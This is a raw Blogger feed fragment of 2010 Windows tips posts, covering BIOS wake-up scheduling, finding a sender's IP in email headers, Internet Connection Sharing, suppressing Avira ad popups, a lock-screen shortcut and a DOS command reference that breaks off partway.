src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3773041175764419598</id><published>2010-03-11T04:53:00.001-08:00</published><updated>2010-03-11T04:53:52.883-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>Start ur system automatic on time</title><content type='html'>Many of u have night unlimited connection and want to schedule the machine by night so that u dont have to wake up by night.&lt;br /&gt;&lt;br /&gt;U can make ur system to turn up automatically.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Steps:&lt;/b&gt;&lt;br /&gt;1. Go to bios&lt;br /&gt;2. Go to power tab&lt;br /&gt;3. There u will found options as follows&lt;br /&gt;wake up from s5----------------intel mb &lt;br /&gt;wake up from irc alram------asus&lt;br /&gt;4. Enable the option&lt;br /&gt;5. Give ethe specified time&lt;br /&gt;6. Press f10&lt;br /&gt;&lt;br /&gt;u r done.. Now just schedule ur dialer by putting them on startup by night and also if u desire to have torrent download put it also at start up.&lt;br /&gt;Make the main power on and keep monitor off&lt;br /&gt;have ur download by morning&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3773041175764419598?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3773041175764419598/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/start-ur-system-automatic-on-time.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3773041175764419598'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3773041175764419598'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/start-ur-system-automatic-on-time.html' title='Start ur system automatic on time'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-27274090648366470</id><published>2010-03-11T04:52:00.001-08:00</published><updated>2010-03-11T04:52:55.019-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Finding IP Address Of the Sender In Hotmail, Yahoo, Gmail</title><content type='html'>When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Finding IP Address Of the Sender In Hotmail&lt;/b&gt;&lt;br /&gt;# Log into your Hotmail account with your username and password.&lt;br /&gt;# Click on the Mail tab on the top.&lt;br /&gt;# Open the mail.&lt;br /&gt;# If you do not see the headers above the mail message, your headers are not displayed . To display the headers,&lt;br /&gt;&lt;br /&gt;* Click on Options on the top-right corner&lt;br /&gt;* In the Mail Options page, click on Mail Display Settings&lt;br /&gt;* In Message Headers, make sure Advanced option is checked.&lt;br /&gt;* Click on Ok button&lt;br /&gt;* Go back to the mails and open that mail. &lt;br /&gt;&lt;br /&gt;# If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address&lt;br /&gt;&lt;br /&gt;* Hotmail headers : dbilla ,In this case the IP address of the sender is [68.34.60.59]. This is be the IP address of the sender. &lt;br /&gt;&lt;br /&gt;# If you find a header with Received: from followed by a Gmail proxy like this&lt;br /&gt;&lt;br /&gt;* Hotmail headers : dbilla&lt;br /&gt;* Look for Received: from followed by IP address within square brackets[]. In this case, the IP address of the sender is [69.140.7.58]. &lt;br /&gt;&lt;br /&gt;# Or else if you have headers like this&lt;br /&gt;&lt;br /&gt;* Hotmail headers : dbilla&lt;br /&gt;* Look for Received: from followed by IP address within square brackets[].&lt;br /&gt;In this case, the IP address of the sender is [61.83.145.129] . &lt;br /&gt;&lt;br /&gt;# If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Finding IP Address of the sender in Yahoo Mail&lt;/b&gt;&lt;br /&gt;# Log into your Yahoo! mail with your username and password.&lt;br /&gt;# Click on Inbox or whichever folder you have stored your mail.&lt;br /&gt;# Open the mail.&lt;br /&gt;# If you do not see the headers above the mail message, your headers are not displayed . To display the headers,&lt;br /&gt;&lt;br /&gt;* Click on Options on the top-right corner&lt;br /&gt;* In the Mail Options page, click on General Preferences&lt;br /&gt;* Scroll down to Messages where you have the Headers option&lt;br /&gt;* Make sure that Show all headers on incoming messages is selected&lt;br /&gt;* Click on the Save button&lt;br /&gt;* Go back to the mails and open that mail.&lt;br /&gt;&lt;br /&gt;# You should see similar headers like this:&lt;br /&gt;&lt;br /&gt;* Yahoo! headers : dbilla&lt;br /&gt;&lt;br /&gt;# Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.&lt;br /&gt;# That is be the IP address of the sender! &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Finding IP Address of the sender in Gmail&lt;/b&gt;&lt;br /&gt;* Log into your Gmail account with your username and password.&lt;br /&gt;* Open the mail.&lt;br /&gt;* To display the headers,&lt;br /&gt;o Click on More options corresponding to that thread. You should get a bunch of links. Click on Show original&lt;br /&gt;* You should get headers like this:&lt;br /&gt;o Gmail headers : dbilla&lt;br /&gt;* Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is 65.119.112.245.&lt;br /&gt;* That is be the IP address of the sender!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-27274090648366470?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/27274090648366470/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/finding-ip-address-of-sender-in-hotmail.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/27274090648366470'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/27274090648366470'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/finding-ip-address-of-sender-in-hotmail.html' title='Finding IP Address Of the Sender In Hotmail, Yahoo, Gmail'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5235920607560938276</id><published>2010-03-11T04:51:00.001-08:00</published><updated>2010-03-11T04:51:54.900-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Share internet between pc and main PC get internet from Mobile</title><content type='html'>To use Internet Connection Sharing to share your Internet connection, the host computer must have one network adapter that is configured to connect to the internal network, and one network adapter or modem that is configured to connect to the Internet.&lt;br /&gt;On the host computer&lt;br /&gt;On the host computer, follow these steps to share the Internet connection:&lt;br /&gt;1. Log on to the host computer as Administrator or as Owner.&lt;br /&gt;2. Click Start, and then click Control Panel.&lt;br /&gt;3. Click Network and Internet Connections.&lt;br /&gt;4. Click Network Connections.&lt;br /&gt;5. Right-click the connection that you use to connect to the Internet. For example, if you connect to the Internet by using a modem, right-click the connection that you want under Dial-up.&lt;br /&gt;6. Click Properties.&lt;br /&gt;7. Click the Advanced tab.&lt;br /&gt;8. Under Internet Connection Sharing, select the Allow other network users to connect through this computer's Internet connection check box.&lt;br /&gt;9. If you are sharing a dial-up Internet connection, select the Establish a dial-up connection whenever a computer on my network attempts to access the Internet check box if you want to permit your computer to automatically connect to the Internet.&lt;br /&gt;10. Click OK. You receive the following message: &lt;br /&gt;When Internet Connection Sharing is enabled, your LAN adapter will be set to use IP&lt;br /&gt;address 192.168.0.1. Your computer may lose connectivity with other computers on your network. If these other computers have static IP addresses, it is a good idea to set them to obtain their IP addresses automatically. Are you sure you want to enable Internet Connection Sharing?&lt;br /&gt;11. Click Yes.&lt;br /&gt;The connection to the Internet is shared to other computers on the local area network (LAN). The network adapter that is connected to the LAN is configured with a static IP address of 192.168.0.1 and a subnet mask of 255.255.255.0&lt;br /&gt;&lt;br /&gt;&lt;b&gt;On the client computer&lt;/b&gt;&lt;br /&gt;To connect to the Internet by using the shared connection, you must confirm the LAN adapter IP configuration, and then configure the client computer. To confirm the LAN adapter IP configuration, follow these steps: &lt;br /&gt;1. Log on to the client computer as Administrator or as Owner.&lt;br /&gt;2. Click Start, and then click Control Panel.&lt;br /&gt;3. Click Network and Internet Connections.&lt;br /&gt;4. Click Network Connections.&lt;br /&gt;5. Right-click Local Area Connection, and then click Properties.&lt;br /&gt;6. Click the General tab, click Internet Protocol (TCP/IP) in the This connection uses the following items list, and then click Properties.&lt;br /&gt;7. In the Internet Protocol (TCP/IP) Properties dialog box, click Obtain an IP address automatically (if it is not already selected), and then click OK.&lt;br /&gt;&lt;br /&gt;Note You can also assign a unique static IP address in the range of 192.168.0.2 to 192.168.0.254. For example, you can assign the following static IP address, subnet mask, and default gateway:&lt;br /&gt;IP Address 192.168.0.2&lt;br /&gt;Subnet mask 255.255.255.0&lt;br /&gt;Default gateway 192.168.0.1&lt;br /&gt;8. In the Local Area Connection Properties dialog box, click OK.&lt;br /&gt;9. Quit Control Panel.&lt;br /&gt;If client machine having windows 98 and then stop here..&lt;br /&gt;If client machine having windows xp then&lt;br /&gt;10. Enter DNS server address (u can find it in main gateway PC using run&gt;cmd&gt;ipconfig /all )&lt;br /&gt;11. DNS server name you have to enter in TCP/IP setting..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5235920607560938276?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5235920607560938276/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/share-internet-between-pc-and-main-pc.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5235920607560938276'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5235920607560938276'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/share-internet-between-pc-and-main-pc.html' title='Share internet between pc and main PC get internet from Mobile'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5739737016492293802</id><published>2010-03-11T04:50:00.001-08:00</published><updated>2010-03-11T04:50:44.566-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><title type='text'>How to Remove the Popup Ads in Avira Antivirus Free Edition</title><content type='html'>&lt;strong&gt;Windows 2000 / Windows XP Pro&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Go to Start &amp;gt; Run.&lt;br /&gt;2.Type gpedit.msc and click OK.&lt;br /&gt;3.Navigate through User Configuration &amp;gt; Administrative Templates &amp;gt; System.&lt;br /&gt;4.Double click "Don't run specified Windows applications".&lt;br /&gt;5.Enable it and click show.&lt;br /&gt;6.Add "avnotify.exe".&lt;br /&gt;7.Click OK on all open windows.&lt;br /&gt;8.Restart.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Windows 7 or Windows Vista Business/Ultimate&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Open the control panel through Start &amp;gt; Control Panel.&lt;br /&gt;2.Go to Administrative Tools &amp;gt; Local security policy.&lt;br /&gt;3.Click on Software Restriction Policy &amp;gt; Action &amp;gt; Create new restriction policy.&lt;br /&gt;4.Right-click, and go to additional rules &amp;gt; new path rule.&lt;br /&gt;5.Click Browse and navigate to C:\Program Files\Avira\AntiVir Desktop\ and double-click avnotify.exe.&lt;br /&gt;6.Set the security level to Disallowed.&lt;br /&gt;7.Click apply and OK.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Windows Vista Home 64-Bit&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Go to C:\Program Files (x86)\Avira\AntiVir Desktop\avnotify.exe for the current version, 9. For earlier versions, go to C:\Program Files\Avira\AntiVir PersonalEdition Classic\avnotify.exe.&lt;br /&gt;2.Right-click avnotify.exe and go to Properties &amp;gt; Security.&lt;br /&gt;3.Under the group or username SYSTEM, click edit.&lt;br /&gt;4.Put a checkmark under the DENY column for "read and execute".&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Windows Vista Home 32-Bit&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Go to C:\Program Files\Avira\AntiVir Desktop\avnotify.exe for the current version, 9. For earlier versions, go to C:\Program Files\Avira\AntiVir PersonalEdition Classic\avnotify.exe.&lt;br /&gt;2.Right-click avnotify.exe and go to Properties &amp;gt; Security.&lt;br /&gt;3.Under the group or username SYSTEM, click edit.&lt;br /&gt;4.Put a checkmark under the DENY comlumn for "read and execute".&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5739737016492293802?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5739737016492293802/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-remove-popup-ads-in-avira.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5739737016492293802'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5739737016492293802'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/how-to-remove-popup-ads-in-avira.html' title='How to Remove the Popup Ads in Avira Antivirus Free Edition'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3495816499904691958</id><published>2010-03-11T04:47:00.001-08:00</published><updated>2010-03-11T04:47:35.574-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Lock Your Computer on Mouse Click</title><content type='html'>Instead of pressing CTRL+ALT+DEL or windows + L to lock your machine you can create an icon to lock your machine. There are very simple steps by using it you can simply lock your computer&lt;br /&gt;using single mouse click.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Just Follow the simple step &gt;&gt;&lt;br /&gt;&lt;br /&gt;1. Right click&lt;br /&gt;&lt;br /&gt;an empty spot on the desktop, point to New and click Shortcut.&lt;br /&gt;&lt;br /&gt;2. In the Create Shortcut dialog box, type the following in the 'Type the location' of the item text box:&lt;br /&gt;&lt;br /&gt;rundll32 user32.dll,LockWorkStation&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Click Next&lt;br /&gt;&lt;br /&gt;4. In "Type a name for this shortcut", type "" (any name as u wish) and Click Finish&lt;br /&gt;&lt;br /&gt;5. This will Create a shortcut in your Desktop.&lt;br /&gt;&lt;br /&gt;6.Now each time when you want to lock the computer , Just click on this shortcut&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3495816499904691958?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3495816499904691958/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2010/03/lock-your-computer-on-mouse-click.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3495816499904691958'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3495816499904691958'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2010/03/lock-your-computer-on-mouse-click.html' title='Lock Your Computer on Mouse Click'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2473999927011928876</id><published>2010-03-11T04:46:00.000-08:00</published><updated>2010-03-11T04:46:13.482-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>Commands with Short description</title><content type='html'>&lt;strong&gt;1. assign&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;The command redirects requests for disk operations on one drive to a different drive.&lt;br /&gt;&lt;br /&gt;assign [x[:]=y[:][...]]&lt;br /&gt;assign /STATUS&lt;br /&gt;&lt;br /&gt;Options:&lt;br /&gt;&lt;br /&gt;* x The drive letter to reassign.&lt;br /&gt;* y The drive letter that x: will be assigned to.&lt;br /&gt;* /STATUS Displays the current drive assignments.&lt;br /&gt;&lt;br /&gt;If typed without parameters then all drive letters are reset to original assignments.&lt;br /&gt;&lt;br /&gt;The command is available in MS-DOS 5.00.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2. append&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;(External)&lt;br /&gt;&lt;br /&gt;Display or sets the search path for data files. DOS will search the specified path(s) if the file is not found in the current path. This had some creative uses, such as allowing non-CD based games to be run from the CD, with configuration/save files stored on the HD.&lt;br /&gt;&lt;br /&gt;append;&lt;br /&gt;append [d:]path[;][d:]path[...]&lt;br /&gt;append [/X:]n|off][/E]&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;3.attrib&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Change or view the attributes of one or more files. It defaults to displaying the attributes of all files in the current directory.&lt;br /&gt;&lt;br /&gt;Options:&lt;br /&gt;&lt;br /&gt;* To add an attribute attach a '+' in front of it.&lt;br /&gt;* To remove an attribute attach a '-' in front of it&lt;br /&gt;* Attributes include&lt;br /&gt;o R - Read-only&lt;br /&gt;o A - Archive&lt;br /&gt;o S - System&lt;br /&gt;o H - Hidden&lt;br /&gt;&lt;br /&gt;attrib [+|-ahrs] [filespec]&lt;br /&gt;&lt;br /&gt;Directory Attrib Functions: It is also possible to use ATTRIB across directories.&lt;br /&gt;&lt;br /&gt;[drive:][path][filename]&lt;br /&gt;Specifies a file or files for attrib to process.&lt;br /&gt;&lt;br /&gt;*&lt;br /&gt;o /D - Process folders as well.&lt;br /&gt;o /S - Process matching files in the current folder and all subfolders.&lt;br /&gt;&lt;br /&gt;Roughly equivalent to the Unix commands chattr and lsattr.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;4. call&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Calls one batch program from another. A new batch file context is created with the specified arguments and control is passed to the statement after the label specified.&lt;br /&gt;&lt;br /&gt;Syntax:&lt;br /&gt;&lt;br /&gt;call [filespec][batch file parameters]&lt;br /&gt;&lt;br /&gt;* filespec: name and if necessary path of the new batch file&lt;br /&gt;* parameters: switches&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;5. cd or chdir&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Change current directory. Displays the current working directory when used without a path parameter.&lt;br /&gt;&lt;br /&gt;cd &lt;br /&gt;&lt;br /&gt;displays the current working directory on the current drive.&lt;br /&gt;&lt;br /&gt;cd f:&lt;br /&gt;&lt;br /&gt;displays the current working directory on F:.&lt;br /&gt;&lt;br /&gt;cd directory&lt;br /&gt;&lt;br /&gt;changes the working directory on the current drive to directory.&lt;br /&gt;&lt;br /&gt;chdir e:directory&lt;br /&gt;&lt;br /&gt;changes the working directory on E: to directory.&lt;br /&gt;&lt;br /&gt;cd ..&lt;br /&gt;&lt;br /&gt;changes the working directory to the parent directory (up one directory level).&lt;br /&gt;&lt;br /&gt;cd \&lt;br /&gt;&lt;br /&gt;changes the working directory to the root (top level) directory of the current drive.&lt;br /&gt;&lt;br /&gt;Equivalent to the Unix command cd (with a path parameter), or pwd (without a parameter). cd .. changes to the parent directory.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;6. chcp&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Changes the code page used to display character glyphs in a console window.&lt;br /&gt;&lt;br /&gt;chcp [codepage]&lt;br /&gt;&lt;br /&gt;With a numeric parameter, this command changes the codepage setting to codepage. Without a parameter, the command displays the currently active codepage.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;7. chkdsk&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Verifies a hard disk or a floppy disk for file system integrity.&lt;br /&gt;&lt;br /&gt;Options:&lt;br /&gt;&lt;br /&gt;* /F :&lt;br /&gt;* /P : Forces a full disk verification&lt;br /&gt;* /R : Searches for defective sectors and recovers legible information (applies /F)&lt;br /&gt;&lt;br /&gt;chkdsk drive [[path]filename] [/F] [/V]&lt;br /&gt;&lt;br /&gt;Equivalent to the Unix command fsck&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;8. choice&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Allows for batch files to prompt the user to select one item from a set of single-character choices.&lt;br /&gt;&lt;br /&gt;Introduced in MS-DOS 6;[1] DR-DOS 7.03.[2]&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;9. cls&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Clears the screen.&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;&lt;br /&gt;Equivalent to the Unix clear.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;10. copy&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Copies files from one location to another. The destination defaults to the current directory. If multiple source files are indicated, the destination must be a directory, or an error will result.&lt;br /&gt;&lt;br /&gt;copy filespec [destination]&lt;br /&gt;&lt;br /&gt;Files may be copied to devices. For example, copy file lpt1 sends the file to the printer on LPT1. copy file con outputs file to the screen ("console"), which can also be done using type file. Devices themselves may be copied: copy con file takes the text typed into the console and puts it into file, stopping when EOF (Ctrl+Z) is typed.&lt;br /&gt;&lt;br /&gt;Files may be concatenated using +. For example, copy file1+file2 file_cat will concatenate the files and output them as file_cat. There are two switches to modify the command's behaviour, /a (text mode, the default) and /b (binary mode). In text mode, copy will stop when it reaches the EOF character; in binary mode, the files will be concatenated in their entirety, ignoring EOF characters. Examples:&lt;br /&gt;&lt;br /&gt;copy /a alpha.txt + beta.txt gamma.txt&lt;br /&gt;copy /b alpha.mpg + beta.mpg gamma.mpg&lt;br /&gt;&lt;br /&gt;Equivalent Unix commands are cp (for copying) and cat (for concatenation). Device files may be copied in Unix as well, e.g. cp file /dev/tty will display a file on the screen (but cat file is more commonly used here).&lt;br /&gt;Equivalent RT-11/RSX-11/OpenVMS command is copy.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;11. defrag&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;(in MS/PC-DOS; diskopt in DR-DOS)&lt;br /&gt;&lt;br /&gt;Defragments a disk drive.&lt;br /&gt;Options:&lt;br /&gt;&lt;br /&gt;* -A – Analyses the fragmentation of a disk drive&lt;br /&gt;* -F – Force defragmentation even if disk space is low&lt;br /&gt;* -V – Verbose output mode&lt;br /&gt;&lt;br /&gt;Example of usage:&lt;br /&gt;&lt;br /&gt;defrag driveletter: -a -v&lt;br /&gt;&lt;br /&gt;No Unix equivalent.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;12. del or erase&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Deletes one or more files.&lt;br /&gt;&lt;br /&gt;del filename&lt;br /&gt;erase filename&lt;br /&gt;&lt;br /&gt;Equivalent to the Unix command rm.&lt;br /&gt;Equivalent in RT-11/RSX-11/OpenVMS operating systems line is delete command which can be contracted to del.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;13. deltree&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Deletes a directory along with all of the files and subdirectories that it contains. Normally, it will ask for confirmation of such a drastic action.&lt;br /&gt;&lt;br /&gt;deltree [/y] directory&lt;br /&gt;&lt;br /&gt;The /y parameter, if present, tells the deltree command to carry out without first prompting for confirmation.&lt;br /&gt;&lt;br /&gt;The deltree command is not included in recent Microsoft Windows operating systems. Deleting a non-empty directory in those versions of Windows where the command is not included, can be achieved by using the rmdir command as in the following example:&lt;br /&gt;&lt;br /&gt;rmdir /s [/q] directory &lt;br /&gt;&lt;br /&gt;In Unix, the functionality of deltree is provided by the rm command with the parameter -r (or -rf for the /y switch).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;14. dir&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Lists the contents of a directory.&lt;br /&gt;&lt;br /&gt;The dir command typed by itself, displays the disk's volume label and serial number; one directory or filename per line, including the filename extension, the file size in bytes, and the date and time the file was last modified; and the total number of files listed, their cumulative size, and the free space (in bytes) remaining on the disk. The command is one of the few commands that exist from the first versions of DOS.&lt;br /&gt;&lt;br /&gt;dir [drive:][path][filename] [parameters]&lt;br /&gt;&lt;br /&gt;Most commonly used parameters of dir include:&lt;br /&gt;&lt;br /&gt;* /W : Displays the listing in wide format, with as many as five filenames or directory names on each line.&lt;br /&gt;* /P : Pause at every page&lt;br /&gt;* /S : Also look in subdirectories&lt;br /&gt;* /Axx: Display files with the specified attributes only&lt;br /&gt;* /Oxx: Modifies sort order&lt;br /&gt;* /B : Uses bare format (no heading information or summary)&lt;br /&gt;* &amp;gt; [drive:][path][filename] : To Store Result in a text file;(c:\dir &amp;gt; c:\fileList.txt)&lt;br /&gt;&lt;br /&gt;Possible attributes for the A parameter are D (directories), R (read-only files), H (hidden files), A (files/directories with the archive bit on), and S (system files). The prefix - negates an attribute; attributes can be combined (e.g. /A:/A means directories with the archive bit on).&lt;br /&gt;&lt;br /&gt;Possible sort orders are N (name), S (size), E (extension), D (date and time), A (last access date), and G (group directories first). The prefix - reverses the order.&lt;br /&gt;&lt;br /&gt;Other less commonly used parameters of dir include:&lt;br /&gt;&lt;br /&gt;* /D : Display wide format but sorted by column&lt;br /&gt;* /L : Display forced into lowercase&lt;br /&gt;* /N : Display forced into long file name format instead of 8.3&lt;br /&gt;* /Q : Displays the owner of each file&lt;br /&gt;* /X : Display shows 8.3 names next to long file names&lt;br /&gt;&lt;br /&gt;The default parameters of dir can be set using the DIRCMD environment variable.&lt;br /&gt;&lt;br /&gt;Equivalent to the Unix command ls (the option -l is "long" list format, it works the opposite way from /w.)&lt;br /&gt;&lt;br /&gt;Equivalent in RT-11/RSX-11/OpenVMS operating systems line is directory command which can be contracted to dir.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;15. echo&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Prints its own arguments back out to the DOS equivalent of the standard output stream. Usually, this means directly to the screen, but the output of echo can be redirected like any other command. Often used in batch files to print text out to the user.&lt;br /&gt;&lt;br /&gt;echo this is text Outputs 'this is text'&lt;br /&gt;echo. Outputs a blank line&lt;br /&gt;&lt;br /&gt;Another important use of the echo command is to toggle echoing of commands on and off in batch files.&lt;br /&gt;&lt;br /&gt;echo on turns on echoing of commands&lt;br /&gt;echo off turns off echoing of commands&lt;br /&gt;&lt;br /&gt;Traditionally batch files begin with the @echo off statement. This says to the interpreter that echoing of commands should be off during the whole execution of the batch file thus resulting in a "tidier" output. The @ symbol declares that this particular command (echo off) should also be executed without echo. For example the following 2 batch files are equivalent:&lt;br /&gt;Batch1.bat:&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;echo The files in your root directory:&lt;br /&gt;dir /b /a-d c:\&lt;br /&gt;&lt;br /&gt;Batch2.bat:&lt;br /&gt;&lt;br /&gt;@echo The files in your root directory:&lt;br /&gt;@dir /b /a-d c:\&lt;br /&gt;&lt;br /&gt;Echo can be used to write to files directly from the console, by redirecting the output stream:&lt;br /&gt;&lt;br /&gt;echo text &amp;gt; filename&lt;br /&gt;&lt;br /&gt;Echo can also be used to append to files directly from the console, again by redirecting the output stream:&lt;br /&gt;&lt;br /&gt;echo text &amp;gt;&amp;gt; filename&lt;br /&gt;&lt;br /&gt;To 